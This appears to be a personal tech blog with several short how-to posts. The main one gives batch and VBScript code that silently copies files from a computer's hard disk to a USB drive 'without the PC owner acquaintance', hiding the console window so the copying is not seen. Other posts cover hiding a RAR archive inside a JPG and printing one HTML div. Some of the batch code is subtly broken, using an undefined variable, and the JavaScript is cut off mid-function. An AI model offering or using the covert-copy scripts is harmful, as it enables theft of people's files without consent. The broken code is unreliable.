Sunday, 17 January 2016

How to copy Removable Disk data to HardDisk silently

In This post you will find how you can copy Removable Disk Data to HardDisk without acquaintance or without copy prompt windows that shows the progress of files. follow bellow steps to achieve this.

Step 1: Firstly you have to create 3 files, named as


"backup_FROM_PD_to_HDD.bat" is a main file that will do this whole process for you, second file "launch.bat" will use to start copy your data from Removable Disk to HardDisk, and the last one "invisible.vbs" this script file will just hide you copy process. above All files should be available in Removable Disk (launch.bat, invisible.vbs, backup_FROM_PD_to_HDD.bat).
Step 2: Open backup_FROM_PD_to_HDD.bat file and write below code:
        @echo off
        echo -------------------
        echo Removable Device Automatic Backup
        echo -------------------
        echo No Rights Reserved, do whatever you want with this.
        xcopy "*" "c:\Removable_Backup\" /Y /E /R /H
        echo Backup Complete!

Step 3: Here "c:\Removable_Backup\" is  a path where you want backup of Removable Disk you can change it, but folder should be available before executing launch.bat file.

Step 4: open launch.bat file and write below code:

        @echo off
        :: variables
        SET odrive=%odrive:~0,2%
        set backupcmd=xcopy  /s /c /d /e /h /i /r /y
        echo off
        wscript.exe \invisible.vbs backup_FROM_PD_to_HDD.bat
        @echo off

Note: No modification is required here just copy and paste above code in your launch.bat file. Now your source and destination configration for copy file has been done.
Step 5: backup_FROM_PD_to_HDD.bat is not enough to hide information from command Prompt, you need to create "invisible.vbs" file and write bellow code:
        CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
Finally you have done whole configration now time to execute your file "launch.bat", this will copy your Removable Disk Data
to specific folder of your HardDisk, without any acquaintance.

Have fun!..

Copy HardDisk data to Removable Disk silently

In This post you will find how you can copy HardDisk Data to your Removable Disk without acquaintance of PC Owner or without copy prompt windows that shows the progress of files. follow bellow steps to achieve this.

Step 1: Firstly you have to create 3 files, named as


"backup_FROM_HDD_to_PD.bat" is a main file that will do this whole process for you, second file "launch.bat" will use to start copy your data from HardDisk to Removable Disk, and the last one "invisible.vbs" this script file will just hide you copy process. All files should be available on your Removable Disk root Directory and all will be parallel to backup_FROM_HDD_to_PD.bat file.
Step 2: Open backup_FROM_HDD_to_PD.bat file and write below code:
        @echo off
        :: variables
        SET odrive=%odrive:~0,2%
        echo off
        echo ——————————-
        echo Removable Device Automatic Backup
        echo ——————————-
        xcopy "D:\SourceFolderName" "%drive%"\DestinationFolderName/Y /E /R /H
        echo Backup Complete!

Step 3: "D:\SourceFolderName" is a path from where you want to copy data to your Removable Disk.

Step 4: In line number 10 after "%drive%" will detect you removable disk from where your launch.bat file will execute
              and after that \DestinationFolderName is a folder name where you want to copy your data.

Step 5: Now your source and destination configration for copy file has been done. you can copy data by executing this
              "backup_FROM_HDD_to_PD.bat" file but this will show you copied file information on you command prompt.

Step 6: As i said in Step 5, backup_FROM_HDD_to_PD.bat is not enough to hide information from command Prompt, you                              need to create "invisible.vbs" file and write bellow code:
        CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

Step 7: Now create 3rd file named as launch.bat this will execute your "backup_FROM_HDD_to_PD.bat" and "invisible.vbs", write
              bellow code to "launch.bat" file

        wscript.exe \invisible.vbs backup_FROM_HDD_to_PD.bat

Finally you have done whole configration now time to execute your file "launch.bat", this will copy your HardDisk Data of
defined location in backup_FROM_HDD_to_PD.bat file to defined folder of your Removable Disk, without the PC owner acquaintance.

Have fun!..

Wednesday, 13 January 2016

How to Print or Save as PDF Particular Div Element Data By Using JS, Css and HTML

It is possible to provide print facility for particular Div of your HTML file. To Do this follow  below instructions.

Step 1: Give an Unique Id to your HTML Div element whose data you want to Print or want to save as PDF.

Step 2: If your Div Element is not  simple plain text, It contains colors, font styles, borders, margins, padding etc. please use External CSS* file instead of Inline Css or Embedded Css.

Step 3: Now you need to load any version of JQuery, Here in this example i am using JQuery for the purpose of write less Do more. their is no dependency on JQuery to Print Div Element. To add JQuery add below script in you HTML Page.

<script src = "" type="text/javascript"> </script>
  Step 4:  Now Add Below Javascript Code at the end of your HTML.

<script type="text/javascript">
$(function () {
$("#PrintButtonID").click(function () {
var contents = $("#DivIDToBePrint").html();
var frame1 = $('<iframe />');
frame1[0].name = "frame1";
frame1.css({ "position": "absolute", "top": "-1000000px" });
var frameDoc = frame1[0].contentWindow ? frame1[0].contentWindow : frame1[0].contentDocument.document ? frame1[0].contentDocument.document : frame1[0].contentDocument;;
//Create a new HTML document.
frameDoc.document.write('<html><head><title>AM info System</title>');
//Append the external CSS file.
frameDoc.document.write('<link href="style.css" rel="stylesheet" type="text/css" />');
//Append the DIV contents.
setTimeout(function () {
}, 500);
Download Working Example from here

Tuesday, 25 March 2014

How To Hide Your Files in image

To hide your files in image you must know some of commands of am windows command prompt and you must have a WinRAR.
lets see how to do.

Step 1. Copy all your files (that you want to hide) in to an specific folder any where in your computer.
             (I recommend you C:\Safe

Step 2. Now compress all file using WinRAR(.rar extension) (i.e with winrar e.g. Safe.rar) and this
             Safe.rar file should be available in C:\Safe directory.

Step 3. Now it’s time to select an image with extension .jpg/.jpeg (e.g xyz.jpg) (to copy your file Safe.rar
             copy selected image in the same directory C:\Safe.

Step 4. Open Command Prompt (Press win key+ R -> type “cmd” press Enter

Step 5. Now type on Command Prompt “cd c:\Safe” and Press Enter

Step 6. Now you have to copy your data file (Safe.rar) into selected image (xyz.jpg)
             Type “copy /b xyz.jpg + Safe.rar output.jpg

          Therefore safe.rar is hidden in output.jpg.
           if you want to view image( i.e xyz.jpg) then you can open the output.jpeg in image viewer and if you 
           want to open Safe.rar then you can open it with WinRAR archive.

If WinRAR archiver is not available on prompt Browse WinRAR in program files folder.
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